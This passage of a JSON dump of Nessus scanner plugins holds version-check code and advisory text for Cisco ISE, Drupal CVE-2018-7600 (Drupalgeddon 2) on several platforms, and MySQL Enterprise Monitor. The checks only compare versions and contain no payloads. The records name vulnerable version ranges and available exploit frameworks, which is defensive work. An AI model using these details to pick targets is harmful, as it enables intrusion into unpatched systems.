: '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:53:01", "description": "The Drupal CMS installed on the remote host is affected by a remote command execution vulnerability. A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "nessus", "title": "Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_CVE-2018-7600_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/109041", "sourceData": "Binary data drupal_CVE-2018-7600_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:43:10", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9, 8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-03-28T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:47:32", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-002", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:56:05", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:drupal7", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:46:08", "description": "Jasper Mattsson found a remote code execution vulnerability in the Drupal content management system. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nFor further information please refer to the official upstream advisory at https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/drupal7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:11", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the following vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. (CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/138901", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138901);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-1258\", \"CVE-2018-8014\", \"CVE-2018-11776\");\n script_bugtraq_id(\n 104203,\n 104222,\n 104530,\n 105125,\n 105538\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the\nfollowing vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when\n alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results\n are used with no namespace and in same time, its upper package have no or wildcard namespace and similar\n to results, same possibility when using url tag which doesn't have value and action set and in same time,\n its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It\n is expected that users of the CORS filter will have configured it appropriately for their environment\n rather than using it in the default configuration. Therefore, it is expected that most users will not be\n impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an\n authorization bypass when using method security. An unauthorized malicious user can gain unauthorized\n access to methods that should be restricted. (CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.4.10, 4.0.7, 8.0.3 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 